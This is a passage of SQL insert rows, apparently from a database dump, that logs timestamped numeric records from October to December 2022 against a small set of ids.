(2640, '2022-10-16 07:01:57', 1, 2058, 0, 1, 1),
(2641, '2022-10-16 07:02:01', 1, 2060, 0, 1, 1),
(2642, '2022-10-16 07:02:02', 1, 2054, 0, 1, 1),
(2643, '2022-10-16 07:02:07', 1, 2059, 0, 1, 1),
(2644, '2022-10-16 07:02:07', 1, 2063, 0, 1, 1),
(2645, '2022-10-16 07:02:08', 1, 2064, 0, 1, 1),
(2646, '2022-10-16 07:02:09', 1, 2062, 0, 1, 1),
(2647, '2022-10-16 07:02:10', 1, 2055, 0, 1, 1),
(2648, '2022-10-16 07:02:11', 1, 2061, 0, 1, 1),
(2649, '2022-10-16 08:34:39', 1, 2058, 0, 1, 1),
(2650, '2022-10-16 14:40:08', 1, 2061, 0, 1, 1),
(2651, '2022-10-16 21:26:21', 1, 2055, 0, 1, 1),
(2652, '2022-10-16 23:22:45', 1, 2053, 0, 1, 1),
(2653, '2022-10-16 23:53:26', 1, 2060, 0, 1, 1),
(2654, '2022-10-17 03:09:45', 1, 2064, 0, 1, 1),
(2655, '2022-10-17 03:10:06', 1, 2060, 0, 1, 1),
(2656, '2022-10-17 03:10:13', 1, 2063, 0, 1, 1),
(2657, '2022-10-17 03:10:22', 1, 2058, 0, 1, 1),
(2658, '2022-10-17 03:10:30', 1, 2059, 0, 1, 1),
(2659, '2022-10-17 03:10:33', 1, 2055, 0, 1, 1),
(2660, '2022-10-17 03:10:40', 1, 2054, 0, 1, 1),
(2661, '2022-10-17 03:10:43', 1, 2062, 0, 1, 1),
(2662, '2022-10-17 03:10:49', 1, 2061, 0, 1, 1),
(2663, '2022-10-17 04:50:34', 1, 2064, 0, 1, 1),
(2664, '2022-10-17 15:34:54', 1, 2064, 0, 1, 1),
(2665, '2022-10-17 16:52:01', 1, 2064, 0, 1, 1),
(2666, '2022-10-17 20:39:32', 1, 2061, 0, 1, 1),
(2667, '2022-10-17 23:56:09', 1, 2055, 0, 1, 1),
(2668, '2022-10-18 02:16:39', 1, 2061, 0, 1, 1),
(2669, '2022-10-18 06:22:22', 1, 2058, 0, 1, 1),
(2670, '2022-10-18 09:52:51', 1, 2055, 0, 1, 1),
(2671, '2022-10-18 15:26:26', 1, 2053, 0, 1, 1),
(2672, '2022-10-18 15:37:21', 1, 2064, 0, 1, 1),
(2673, '2022-10-18 15:48:09', 1, 2064, 0, 1, 1),
(2674, '2022-10-18 15:48:45', 1, 2064, 0, 1, 1),
(2675, '2022-10-18 15:49:21', 1, 2064, 0, 1, 1),
(2676, '2022-10-18 20:46:44', 1, 2053, 0, 1, 1),
(2677, '2022-10-19 04:30:59', 1, 2055, 0, 1, 1),
(2678, '2022-10-19 15:51:25', 1, 2055, 0, 1, 1),
(2679, '2022-10-19 21:09:36', 1, 2064, 0, 1, 1),
(2680, '2022-10-21 07:07:08', 1, 2054, 0, 1, 1),
(2681, '2022-10-21 07:07:13', 1, 2055, 0, 1, 1),
(2682, '2022-10-21 07:07:34', 1, 2064, 0, 1, 1),
(2683, '2022-10-21 07:07:38', 1, 2063, 0, 1, 1),
(2684, '2022-10-21 07:07:44', 1, 2062, 0, 1, 1),
(2685, '2022-10-21 07:07:54', 1, 2060, 0, 1, 1),
(2686, '2022-10-21 07:08:02', 1, 2059, 0, 1, 1),
(2687, '2022-10-21 07:08:06', 1, 2061, 0, 1, 1),
(2688, '2022-10-21 07:08:12', 1, 2058, 0, 1, 1),
(2689, '2022-10-21 07:58:26', 1, 2054, 0, 1, 1),
(2690, '2022-10-21 08:21:40', 1, 2053, 0, 1, 1),
(2691, '2022-10-21 08:21:46', 1, 2054, 0, 1, 1),
(2692, '2022-10-21 20:03:09', 1, 2061, 0, 1, 1),
(2693, '2022-10-21 20:03:13', 1, 2061, 0, 1, 1),
(2694, '2022-10-21 20:03:20', 1, 2061, 0, 1, 1),
(2695, '2022-10-22 13:12:38', 1, 2058, 0, 1, 1),
(2696, '2022-10-22 13:13:25', 1, 2061, 0, 1, 1),
(2697, '2022-10-22 13:14:00', 1, 2059, 0, 1, 1),
(2698, '2022-10-22 13:14:35', 1, 2060, 0, 1, 1),
(2699, '2022-10-22 13:15:10', 1, 2062, 0, 1, 1),
(2700, '2022-10-22 13:15:43', 1, 2063, 0, 1, 1),
(2701, '2022-10-22 13:16:17', 1, 2064, 0, 1, 1),
(2702, '2022-10-22 13:19:44', 1, 2055, 0, 1, 1),
(2703, '2022-10-22 13:20:12', 1, 2054, 0, 1, 1),
(2704, '2022-10-22 13:56:58', 1, 2059, 0, 1, 1),
(2705, '2022-10-22 14:24:30', 1, 2058, 0, 1, 1),
(2706, '2022-10-22 14:24:54', 1, 2061, 0, 1, 1),
(2707, '2022-10-22 14:25:19', 1, 2059, 0, 1, 1),
(2708, '2022-10-22 14:25:43', 1, 2060, 0, 1, 1),
(2709, '2022-10-22 14:26:08', 1, 2062, 0, 1, 1),
(2710, '2022-10-22 14:26:34', 1, 2063, 0, 1, 1),
(2711, '2022-10-22 14:26:56', 1, 2064, 0, 1, 1),
(2712, '2022-10-22 14:30:27', 1, 2055, 0, 1, 1),
(2713, '2022-10-22 14:30:50', 1, 2054, 0, 1, 1),
(2714, '2022-10-22 14:31:13', 1, 2053, 0, 1, 1),
(2715, '2022-10-23 08:47:33', 1, 2063, 0, 1, 1),
(2716, '2022-10-23 08:47:45', 1, 2063, 0, 1, 1),
(2717, '2022-10-23 08:47:46', 1, 2063, 0, 1, 1),
(2718, '2022-10-23 19:01:36', 1, 2063, 0, 1, 1),
(2719, '2022-10-23 20:56:00', 1, 2062, 0, 1, 1),
(2720, '2022-10-24 18:48:18', 5, 2061, 57, 0, 1),
(2721, '2022-10-25 04:04:04', 1, 2064, 0, 1, 1),
(2722, '2022-10-26 10:02:31', 1, 2055, 0, 1, 1),
(2723, '2022-10-28 08:00:09', 1, 2061, 0, 1, 1),
(2724, '2022-10-29 12:40:30', 1, 2061, 0, 1, 1),
(2725, '2022-10-30 15:34:59', 1, 2064, 0, 1, 1),
(2726, '2022-10-30 15:35:32', 1, 2064, 0, 1, 1),
(2727, '2022-10-31 07:25:55', 1, 2060, 0, 1, 1),
(2728, '2022-10-31 07:28:29', 1, 2063, 0, 1, 1),
(2729, '2022-10-31 07:35:06', 1, 2058, 0, 1, 1),
(2730, '2022-10-31 07:47:31', 1, 2055, 0, 1, 1),
(2731, '2022-10-31 08:06:34', 1, 2061, 0, 1, 1),
(2732, '2022-10-31 08:16:21', 1, 2062, 0, 1, 1),
(2733, '2022-10-31 08:34:04', 1, 2054, 0, 1, 1),
(2734, '2022-10-31 08:37:49', 1, 2059, 0, 1, 1),
(2735, '2022-10-31 08:40:41', 1, 2064, 0, 1, 1),
(2736, '2022-10-31 10:48:56', 1, 2062, 0, 1, 1),
(2737, '2022-10-31 11:25:42', 1, 2063, 0, 1, 1),
(2738, '2022-11-01 07:52:53', 1, 2058, 0, 1, 1),
(2739, '2022-11-01 07:53:05', 1, 2064, 0, 1, 1),
(2740, '2022-11-01 07:53:26', 1, 2062, 0, 1, 1),
(2741, '2022-11-01 07:53:28', 1, 2055, 0, 1, 1),
(2742, '2022-11-01 07:53:36', 1, 2059, 0, 1, 1),
(2743, '2022-11-01 07:53:39', 1, 2063, 0, 1, 1),
(2744, '2022-11-01 07:53:42', 1, 2061, 0, 1, 1),
(2745, '2022-11-01 07:53:54', 1, 2060, 0, 1, 1),
(2746, '2022-11-01 07:53:56', 1, 2054, 0, 1, 1),
(2747, '2022-11-01 07:56:15', 1, 2054, 0, 1, 1),
(2748, '2022-11-01 07:56:21', 1, 2058, 0, 1, 1),
(2749, '2022-11-01 07:56:30', 1, 2064, 0, 1, 1),
(2750, '2022-11-01 07:56:32', 1, 2060, 0, 1, 1),
(2751, '2022-11-01 07:56:48', 1, 2061, 0, 1, 1),
(2752, '2022-11-01 07:56:51', 1, 2062, 0, 1, 1),
(2753, '2022-11-01 07:56:53', 1, 2055, 0, 1, 1),
(2754, '2022-11-01 07:57:00', 1, 2063, 0, 1, 1),
(2755, '2022-11-01 07:57:04', 1, 2059, 0, 1, 1),
(2756, '2022-11-01 07:57:20', 1, 2053, 0, 1, 1),
(2757, '2022-11-01 09:08:44', 1, 2061, 0, 1, 1),
(2758, '2022-11-01 16:17:43', 1, 2060, 0, 1, 1),
(2759, '2022-11-02 01:41:09', 1, 2059, 0, 1, 1),
(2760, '2022-11-03 08:12:34', 1, 2053, 0, 1, 1),
(2761, '2022-11-03 16:57:40', 1, 2055, 0, 1, 1),
(2762, '2022-11-05 10:19:26', 1, 2064, 0, 1, 1),
(2763, '2022-11-05 10:19:26', 1, 2064, 0, 1, 1),
(2764, '2022-11-05 10:19:30', 1, 2064, 0, 1, 1),
(2765, '2022-11-05 10:19:31', 1, 2064, 0, 1, 1),
(2766, '2022-11-05 10:19:33', 1, 2064, 0, 1, 1),
(2767, '2022-11-05 19:22:55', 1, 2063, 0, 1, 1),
(2768, '2022-11-05 19:43:21', 1, 2064, 0, 1, 1),
(2769, '2022-11-05 22:48:54', 1, 2063, 0, 1, 1),
(2770, '2022-11-06 03:26:38', 1, 2060, 0, 1, 1),
(2771, '2022-11-06 03:58:56', 1, 2054, 0, 1, 1),
(2772, '2022-11-06 03:59:00', 1, 2055, 0, 1, 1),
(2773, '2022-11-06 03:59:09', 1, 2063, 0, 1, 1),
(2774, '2022-11-06 03:59:12', 1, 2064, 0, 1, 1),
(2775, '2022-11-06 03:59:18', 1, 2062, 0, 1, 1),
(2776, '2022-11-06 08:09:48', 1, 2054, 0, 1, 1),
(2777, '2022-11-06 08:10:04', 1, 2055, 0, 1, 1),
(2778, '2022-11-06 08:11:15', 1, 2064, 0, 1, 1),
(2779, '2022-11-06 08:11:34', 1, 2063, 0, 1, 1),
(2780, '2022-11-06 08:11:53', 1, 2062, 0, 1, 1),
(2781, '2022-11-06 08:12:09', 1, 2060, 0, 1, 1),
(2782, '2022-11-06 08:12:24', 1, 2059, 0, 1, 1),
(2783, '2022-11-06 08:12:37', 1, 2061, 0, 1, 1),
(2784, '2022-11-06 08:12:48', 1, 2058, 0, 1, 1),
(2785, '2022-11-06 13:02:42', 1, 2053, 0, 1, 1),
(2786, '2022-11-07 11:14:24', 1, 2064, 0, 1, 1),
(2787, '2022-11-07 20:51:20', 1, 2062, 0, 1, 1),
(2788, '2022-11-08 05:25:03', 1, 2064, 0, 1, 1),
(2789, '2022-11-08 07:18:22', 1, 2059, 0, 1, 1),
(2790, '2022-11-08 07:18:26', 1, 2059, 0, 1, 1),
(2791, '2022-11-08 07:18:51', 1, 2055, 0, 1, 1),
(2792, '2022-11-08 07:18:55', 1, 2055, 0, 1, 1),
(2793, '2022-11-08 07:19:03', 1, 2063, 0, 1, 1),
(2794, '2022-11-08 07:19:07', 1, 2063, 0, 1, 1),
(2795, '2022-11-08 21:04:12', 1, 2063, 0, 1, 1),
(2796, '2022-11-08 23:29:43', 1, 2060, 0, 1, 1),
(2797, '2022-11-08 23:31:56', 1, 2063, 0, 1, 1),
(2798, '2022-11-08 23:37:35', 1, 2058, 0, 1, 1),
(2799, '2022-11-08 23:48:03', 1, 2055, 0, 1, 1),
(2800, '2022-11-09 00:04:44', 1, 2061, 0, 1, 1),
(2801, '2022-11-09 00:13:25', 1, 2062, 0, 1, 1),
(2802, '2022-11-09 00:29:10', 1, 2054, 0, 1, 1),
(2803, '2022-11-09 00:32:19', 1, 2059, 0, 1, 1),
(2804, '2022-11-09 00:34:57', 1, 2064, 0, 1, 1),
(2805, '2022-11-09 06:59:35', 1, 2059, 0, 1, 1),
(2806, '2022-11-09 21:48:45', 1, 2064, 0, 1, 1),
(2807, '2022-11-10 02:31:56', 1, 2055, 0, 1, 1),
(2808, '2022-11-10 02:45:29', 1, 2054, 0, 1, 1),
(2809, '2022-11-10 03:29:36', 1, 2061, 0, 1, 1),
(2810, '2022-11-10 07:03:42', 1, 2063, 0, 1, 1),
(2811, '2022-11-10 08:16:09', 1, 2053, 0, 1, 1),
(2812, '2022-11-10 09:53:05', 1, 2064, 0, 1, 1),
(2813, '2022-11-10 10:12:36', 1, 2064, 0, 1, 1),
(2814, '2022-11-10 18:49:40', 1, 2060, 0, 1, 1),
(2815, '2022-11-10 21:50:30', 1, 2059, 0, 1, 1),
(2816, '2022-11-10 22:41:04', 1, 2055, 0, 1, 1),
(2817, '2022-11-11 05:15:47', 1, 2054, 0, 1, 1),
(2818, '2022-11-11 06:21:59', 1, 2063, 0, 1, 1),
(2819, '2022-11-11 06:36:31', 1, 2059, 0, 1, 1),
(2820, '2022-11-11 11:07:48', 1, 2055, 0, 1, 1),
(2821, '2022-11-11 11:58:09', 1, 2064, 0, 1, 1),
(2822, '2022-11-11 18:13:31', 1, 2063, 0, 1, 1),
(2823, '2022-11-11 18:13:33', 1, 2063, 0, 1, 1),
(2824, '2022-11-11 18:23:42', 1, 2064, 0, 1, 1),
(2825, '2022-11-11 18:24:41', 1, 2064, 0, 1, 1),
(2826, '2022-11-11 19:41:37', 1, 2054, 0, 1, 1),
(2827, '2022-11-11 19:41:43', 1, 2060, 0, 1, 1),
(2828, '2022-11-11 19:41:49', 1, 2058, 0, 1, 1),
(2829, '2022-11-11 19:42:02', 1, 2064, 0, 1, 1),
(2830, '2022-11-11 19:42:15', 1, 2062, 0, 1, 1),
(2831, '2022-11-11 19:42:22', 1, 2055, 0, 1, 1),
(2832, '2022-11-11 19:42:31', 1, 2059, 0, 1, 1),
(2833, '2022-11-11 19:42:35', 1, 2063, 0, 1, 1),
(2834, '2022-11-11 19:42:38', 1, 2061, 0, 1, 1),
(2835, '2022-11-11 19:45:05', 1, 2058, 0, 1, 1),
(2836, '2022-11-11 19:45:14', 1, 2064, 0, 1, 1),
(2837, '2022-11-11 19:45:26', 1, 2062, 0, 1, 1),
(2838, '2022-11-11 19:45:28', 1, 2055, 0, 1, 1),
(2839, '2022-11-11 19:45:33', 1, 2059, 0, 1, 1),
(2840, '2022-11-11 19:45:35', 1, 2063, 0, 1, 1),
(2841, '2022-11-11 19:45:38', 1, 2061, 0, 1, 1),
(2842, '2022-11-11 19:45:42', 1, 2054, 0, 1, 1),
(2843, '2022-11-11 19:45:45', 1, 2060, 0, 1, 1),
(2844, '2022-11-11 19:46:02', 1, 2053, 0, 1, 1),
(2845, '2022-11-11 19:46:22', 1, 2058, 0, 1, 1),
(2846, '2022-11-12 18:04:15', 1, 2063, 0, 1, 1),
(2847, '2022-11-12 19:02:04', 1, 2062, 0, 1, 1),
(2848, '2022-11-13 06:22:23', 1, 2054, 0, 1, 1),
(2849, '2022-11-14 14:56:15', 1, 2064, 0, 1, 1),
(2850, '2022-11-14 16:26:27', 1, 2064, 0, 1, 1),
(2851, '2022-11-14 19:38:46', 1, 2064, 0, 1, 1),
(2852, '2022-11-14 22:46:05', 1, 2060, 0, 1, 1),
(2853, '2022-11-15 02:57:12', 1, 2064, 0, 1, 1),
(2854, '2022-11-15 03:11:52', 1, 2059, 0, 1, 1),
(2855, '2022-11-15 06:39:48', 1, 2061, 0, 1, 1),
(2856, '2022-11-15 07:39:52', 1, 2063, 0, 1, 1),
(2857, '2022-11-15 07:39:54', 1, 2054, 0, 1, 1),
(2858, '2022-11-15 11:40:28', 1, 2060, 0, 1, 1),
(2859, '2022-11-15 11:48:11', 1, 2060, 0, 1, 1),
(2860, '2022-11-15 18:55:35', 1, 2053, 0, 1, 1),
(2861, '2022-11-16 02:07:04', 1, 2060, 0, 1, 1),
(2862, '2022-11-16 02:08:55', 1, 2063, 0, 1, 1),
(2863, '2022-11-16 02:13:24', 1, 2058, 0, 1, 1),
(2864, '2022-11-16 02:21:59', 1, 2055, 0, 1, 1),
(2865, '2022-11-16 02:40:58', 1, 2061, 0, 1, 1),
(2866, '2022-11-16 02:51:20', 1, 2062, 0, 1, 1),
(2867, '2022-11-16 03:08:36', 1, 2054, 0, 1, 1),
(2868, '2022-11-16 03:11:39', 1, 2059, 0, 1, 1),
(2869, '2022-11-16 03:13:58', 1, 2064, 0, 1, 1),
(2870, '2022-11-16 06:50:57', 1, 2058, 0, 1, 1),
(2871, '2022-11-16 10:07:42', 1, 2064, 0, 1, 1),
(2872, '2022-11-16 11:33:49', 1, 2055, 0, 1, 1),
(2873, '2022-11-16 16:15:33', 1, 2054, 0, 1, 1),
(2874, '2022-11-17 03:02:05', 1, 2061, 0, 1, 1),
(2875, '2022-11-17 07:27:46', 1, 2060, 0, 1, 1),
(2876, '2022-11-17 08:45:08', 1, 2055, 0, 1, 1),
(2877, '2022-11-17 13:49:18', 1, 2053, 0, 1, 1),
(2878, '2022-11-17 14:20:04', 1, 2059, 0, 1, 1),
(2879, '2022-11-17 17:01:50', 1, 2063, 0, 1, 1),
(2880, '2022-11-17 22:25:53', 1, 2054, 0, 1, 1),
(2881, '2022-11-18 06:01:19', 1, 2063, 0, 1, 1),
(2882, '2022-11-18 12:59:19', 1, 2062, 0, 1, 1),
(2883, '2022-11-18 16:13:46', 1, 2060, 0, 1, 1),
(2884, '2022-11-18 17:17:15', 1, 2055, 0, 1, 1),
(2885, '2022-11-19 02:58:40', 1, 2059, 0, 1, 1),
(2886, '2022-11-19 07:59:22', 1, 2064, 0, 1, 1),
(2887, '2022-11-19 09:57:46', 1, 2058, 0, 1, 1),
(2888, '2022-11-19 09:58:52', 1, 2060, 0, 1, 1),
(2889, '2022-11-19 13:01:40', 1, 2064, 0, 1, 1),
(2890, '2022-11-19 13:01:54', 1, 2063, 0, 1, 1),
(2891, '2022-11-19 13:02:03', 1, 2062, 0, 1, 1),
(2892, '2022-11-19 13:02:15', 1, 2061, 0, 1, 1),
(2893, '2022-11-19 13:02:27', 1, 2060, 0, 1, 1),
(2894, '2022-11-19 13:02:38', 1, 2059, 0, 1, 1),
(2895, '2022-11-19 13:02:50', 1, 2058, 0, 1, 1),
(2896, '2022-11-19 13:03:02', 1, 2055, 0, 1, 1),
(2897, '2022-11-19 13:03:13', 1, 2054, 0, 1, 1),
(2898, '2022-11-19 13:19:26', 1, 2053, 0, 1, 1),
(2899, '2022-11-19 18:10:40', 1, 2064, 0, 1, 1),
(2900, '2022-11-20 04:43:49', 1, 2064, 0, 1, 1),
(2901, '2022-11-20 07:20:15', 1, 2063, 0, 1, 1),
(2902, '2022-11-20 07:20:35', 1, 2062, 0, 1, 1),
(2903, '2022-11-20 10:19:15', 1, 2054, 0, 1, 1),
(2904, '2022-11-20 14:06:42', 1, 2064, 0, 1, 1),
(2905, '2022-11-20 20:08:14', 1, 2053, 0, 1, 1),
(2906, '2022-11-20 22:19:03', 1, 2062, 0, 1, 1),
(2907, '2022-11-20 22:19:17', 1, 2062, 0, 1, 1),
(2908, '2022-11-21 02:09:18', 1, 2064, 0, 1, 1),
(2909, '2022-11-21 03:11:23', 1, 2053, 0, 1, 1),
(2910, '2022-11-21 09:08:18', 1, 2055, 0, 1, 1),
(2911, '2022-11-21 09:08:20', 1, 2058, 0, 1, 1),
(2912, '2022-11-21 13:03:06', 1, 2059, 0, 1, 1),
(2913, '2022-11-21 13:20:09', 1, 2064, 0, 1, 1),
(2914, '2022-11-21 16:17:31', 1, 2054, 0, 1, 1),
(2915, '2022-11-21 16:18:04', 1, 2055, 0, 1, 1),
(2916, '2022-11-21 16:20:11', 1, 2064, 0, 1, 1),
(2917, '2022-11-21 16:20:43', 1, 2063, 0, 1, 1),
(2918, '2022-11-21 16:21:15', 1, 2062, 0, 1, 1),
(2919, '2022-11-21 16:21:48', 1, 2060, 0, 1, 1),
(2920, '2022-11-21 16:22:21', 1, 2059, 0, 1, 1),
(2921, '2022-11-21 16:22:53', 1, 2061, 0, 1, 1),
(2922, '2022-11-21 16:23:26', 1, 2058, 0, 1, 1),
(2923, '2022-11-22 04:46:06', 1, 2058, 0, 1, 1),
(2924, '2022-11-22 08:23:59', 1, 2063, 0, 1, 1),
(2925, '2022-11-22 09:15:23', 1, 2059, 0, 1, 1),
(2926, '2022-11-22 09:30:36', 1, 2061, 0, 1, 1),
(2927, '2022-11-22 10:31:30', 1, 2054, 0, 1, 1),
(2928, '2022-11-22 13:36:49', 1, 2061, 0, 1, 1),
(2929, '2022-11-22 13:36:56', 1, 2061, 0, 1, 1),
(2930, '2022-11-22 14:46:54', 1, 2059, 0, 1, 1),
(2931, '2022-11-22 16:03:18', 1, 2064, 0, 1, 1),
(2932, '2022-11-22 22:38:21', 1, 2054, 0, 1, 1),
(2933, '2022-11-22 23:07:40', 1, 2059, 0, 1, 1),
(2934, '2022-11-23 01:40:29', 1, 2064, 0, 1, 1),
(2935, '2022-11-23 10:47:12', 1, 2053, 0, 1, 1),
(2936, '2022-11-23 12:40:23', 1, 2063, 0, 1, 1),
(2937, '2022-11-23 14:29:26', 1, 2055, 0, 1, 1),
(2938, '2022-11-24 22:50:47', 1, 2061, 0, 1, 1),
(2939, '2022-11-25 05:42:28', 1, 2054, 0, 1, 1),
(2940, '2022-11-25 09:26:18', 1, 2064, 0, 1, 1),
(2941, '2022-11-25 11:18:02', 1, 2054, 0, 1, 1),
(2942, '2022-11-26 00:54:21', 1, 2059, 0, 1, 1),
(2943, '2022-11-26 05:01:04', 1, 2062, 0, 1, 1),
(2944, '2022-11-26 08:24:43', 1, 2055, 0, 1, 1),
(2945, '2022-11-26 22:26:27', 1, 2060, 0, 1, 1),
(2946, '2022-11-26 23:43:04', 1, 2054, 0, 1, 1),
(2947, '2022-11-27 03:39:54', 1, 2064, 0, 1, 1),
(2948, '2022-11-27 03:45:45', 1, 2054, 0, 1, 1),
(2949, '2022-11-27 03:45:47', 1, 2064, 0, 1, 1),
(2950, '2022-11-27 03:45:53', 1, 2058, 0, 1, 1),
(2951, '2022-11-27 03:45:56', 1, 2063, 0, 1, 1),
(2952, '2022-11-27 03:45:57', 1, 2055, 0, 1, 1),
(2953, '2022-11-27 03:45:58', 1, 2061, 0, 1, 1),
(2954, '2022-11-27 03:45:59', 1, 2060, 0, 1, 1),
(2955, '2022-11-27 03:46:01', 1, 2059, 0, 1, 1),
(2956, '2022-11-27 06:32:28', 1, 2063, 0, 1, 1),
(2957, '2022-11-27 08:50:03', 1, 2054, 0, 1, 1),
(2958, '2022-11-27 13:40:17', 1, 2064, 0, 1, 1),
(2959, '2022-11-27 14:54:54', 1, 2060, 0, 1, 1),
(2960, '2022-11-27 19:05:44', 1, 2053, 0, 1, 1),
(2961, '2022-11-27 20:32:28', 1, 2063, 0, 1, 1),
(2962, '2022-11-28 00:05:19', 1, 2054, 0, 1, 1),
(2963, '2022-11-29 11:25:38', 1, 2055, 0, 1, 1),
(2964, '2022-11-29 14:19:09', 1, 2058, 0, 1, 1),
(2965, '2022-11-29 14:19:28', 1, 2058, 0, 1, 1),
(2966, '2022-11-29 14:39:08', 1, 2060, 0, 1, 1),
(2967, '2022-11-29 14:47:13', 1, 2061, 0, 1, 1),
(2968, '2022-11-29 16:19:11', 1, 2059, 0, 1, 1),
(2969, '2022-11-29 23:48:45', 1, 2060, 0, 1, 1),
(2970, '2022-11-30 00:00:14', 1, 2063, 0, 1, 1),
(2971, '2022-11-30 00:29:37', 1, 2058, 0, 1, 1),
(2972, '2022-11-30 01:22:45', 1, 2055, 0, 1, 1),
(2973, '2022-11-30 01:45:20', 1, 2064, 0, 1, 1),
(2974, '2022-11-30 01:49:24', 1, 2055, 0, 1, 1),
(2975, '2022-11-30 02:49:25', 1, 2061, 0, 1, 1),
(2976, '2022-11-30 02:51:13', 1, 2062, 0, 1, 1),
(2977, '2022-11-30 03:33:55', 1, 2062, 0, 1, 1),
(2978, '2022-11-30 03:37:46', 1, 2059, 0, 1, 1),
(2979, '2022-11-30 04:52:27', 1, 2054, 0, 1, 1),
(2980, '2022-11-30 05:09:32', 1, 2059, 0, 1, 1),
(2981, '2022-11-30 05:23:28', 1, 2064, 0, 1, 1),
(2982, '2022-11-30 11:22:27', 1, 2064, 0, 1, 1),
(2983, '2022-11-30 18:21:59', 1, 2059, 0, 1, 1),
(2984, '2022-11-30 22:33:34', 1, 2053, 0, 1, 1),
(2985, '2022-12-01 05:34:38', 1, 2060, 0, 1, 1),
(2986, '2022-12-01 15:39:35', 1, 2064, 0, 1, 1),
(2987, '2022-12-01 16:11:32', 1, 2054, 0, 1, 1),
(2988, '2022-12-01 16:11:41', 1, 2055, 0, 1, 1),
(2989, '2022-12-01 16:12:02', 1, 2064, 0, 1, 1),
(2990, '2022-12-01 16:12:12', 1, 2063, 0, 1, 1),
(2991, '2022-12-01 16:12:22', 1, 2062, 0, 1, 1),
(2992, '2022-12-01 16:12:28', 1, 2060, 0, 1, 1),
(2993, '2022-12-01 16:12:37', 1, 2059, 0, 1, 1),
(2994, '2022-12-01 16:12:44', 1, 2061, 0, 1, 1),
(2995, '2022-12-01 16:12:51', 1, 2058, 0, 1, 1),
(2996, '2022-12-02 01:32:38', 1, 2054, 0, 1, 1),
(2997, '2022-12-02 01:32:50', 1, 2055, 0, 1, 1),
(2998, '2022-12-02 01:33:18', 1, 2064, 0, 1, 1),
(2999, '2022-12-02 01:33:32', 1, 2063, 0, 1, 1),
(3000, '2022-12-02 01:33:41', 1, 2062, 0, 1, 1),
(3001, '2022-12-02 01:33:47', 1, 2060, 0, 1, 1),
(3002, '2022-12-02 01:33:53', 1, 2059, 0, 1, 1),
(3003, '2022-12-02 01:34:00', 1, 2061, 0, 1, 1),
(3004, '2022-12-02 01:34:06', 1, 2058, 0, 1, 1),
(3005, '2022-12-02 02:01:14', 1, 2059, 0, 1, 1),
(3006, '2022-12-02 02:59:41', 1, 2055, 0, 1, 1),
(3007, '2022-12-02 03:18:39', 1, 2063, 0, 1, 1),
(3008, '2022-12-02 05:24:39', 1, 2055, 0, 1, 1),
(3009, '2022-12-02 07:50:01', 1, 2054, 0, 1, 1),
(3010, '2022-12-02 07:50:33', 1, 2055, 0, 1, 1),
(3011, '2022-12-02 08:02:16', 1, 2058, 0, 1, 1),
(3012, '2022-12-02 08:03:01', 1, 2061, 0, 1, 1),
(3013, '2022-12-02 08:03:16', 1, 2060, 0, 1, 1),
(3014, '2022-12-02 08:03:55', 1, 2059, 0, 1, 1),
(3015, '2022-12-02 08:05:27', 1, 2063, 0, 1, 1),
(3016, '2022-12-02 08:18:51', 1, 2062, 0, 1, 1),
(3017, '2022-12-02 08:19:32', 1, 2064, 0, 1, 1),
(3018, '2022-12-02 09:12:01', 1, 2053, 0, 1, 1),
(3019, '2022-12-02 16:04:21', 1, 2063, 0, 1, 1),
(3020, '2022-12-02 22:49:33', 1, 2061, 0, 1, 1),
(3021, '2022-12-03 00:46:55', 1, 2054, 0, 1, 1),
(3022, '2022-12-03 00:46:56', 1, 2055, 0, 1, 1),
(3023, '2022-12-03 00:47:03', 1, 2062, 0, 1, 1),
(3024, '2022-12-03 00:47:04', 1, 2064, 0, 1, 1),
(3025, '2022-12-03 00:47:06', 1, 2063, 0, 1, 1),
(3026, '2022-12-03 00:47:07', 1, 2060, 0, 1, 1),
(3027, '2022-12-03 00:47:08', 1, 2059, 0, 1, 1),
(3028, '2022-12-03 00:47:10', 1, 2061, 0, 1, 1),
(3029, '2022-12-03 00:47:15', 1, 2058, 0, 1, 1),
(3030, '2022-12-03 14:07:55', 1, 2063, 0, 1, 1),
(3031, '2022-12-03 16:29:33', 1, 2053, 0, 1, 1),
(3032, '2022-12-03 22:49:33', 1, 2061, 0, 1, 1),
(3033, '2022-12-04 15:58:49', 1, 2064, 0, 1, 1),
(3034, '2022-12-04 18:52:36', 1, 2064, 0, 1, 1),
(3035, '2022-12-04 20:02:06', 1, 2054, 0, 1, 1),
(3036, '2022-12-04 20:03:48', 1, 2064, 0, 1, 1),
(3037, '2022-12-04 20:41:38', 1, 2061, 0, 1, 1),
(3038, '2022-12-04 20:41:41', 1, 2059, 0, 1, 1),
(3039, '2022-12-05 02:16:58', 1, 2053, 0, 1, 1),
(3040, '2022-12-05 10:34:42', 1, 2054, 0, 1, 1),
(3041, '2022-12-05 20:03:59', 1, 2059, 0, 1, 1),
(3042, '2022-12-05 21:04:53', 4, 2061, 625, 1, 1),
(3043, '2022-12-05 21:04:57', 1, 2064, 625, 1, 1),
(3044, '2022-12-05 21:05:02', 1, 2063, 625, 1, 1),
(3045, '2022-12-05 21:05:13', 1, 2062, 625, 1, 1),
(3046, '2022-12-05 21:05:14', 1, 2061, 625, 1, 1),
(3047, '2022-12-05 21:05:16', 1, 2060, 625, 1, 1),
(3048, '2022-12-05 21:05:21', 1, 2059, 625, 1, 1),
(3049, '2022-12-05 21:05:24', 1, 2058, 625, 1, 1),
(3050, '2022-12-05 21:05:27', 1, 2055, 625, 1, 1),
(3051, '2022-12-05 21:05:34', 1, 2054, 625, 1, 1),
(3052, '2022-12-05 21:05:40', 1, 2053, 625, 1, 1),
(3053, '2022-12-05 21:06:53', 1, 2064, 625, 1, 1),
(3054, '2022-12-05 21:07:00', 1, 2064, 625, 1, 1),
(3055, '2022-12-05 21:07:07', 1, 2064, 625, 1, 1),
(3056, '2022-12-05 21:07:11', 1, 2064, 625, 1, 1),
(3057, '2022-12-05 21:07:13', 1, 2064, 625, 1, 1),
(3058, '2022-12-05 21:07:20', 1, 2064, 625, 1, 1),
(3059, '2022-12-05 21:07:24', 1, 2064, 625, 1, 1),
(3060, '2022-12-05 21:07:25', 1, 2064, 625, 1, 1),
(3061, '2022-12-05 21:07:30', 1, 2063, 625, 1, 1),
(3062, '2022-12-05 21:07:32', 1, 2063, 625, 1, 1),
(3063, '2022-12-05 21:07:35', 1, 2063, 625, 1, 1),
(3064, '2022-12-05 21:07:41', 1, 2064, 625, 1, 1),
(3065, '2022-12-05 21:07:43', 1, 2063, 625, 1, 1),
(3066, '2022-12-05 21:07:44', 1, 2063, 625, 1, 1),
(3067, '2022-12-05 21:07:48', 1, 2063, 625, 1, 1),
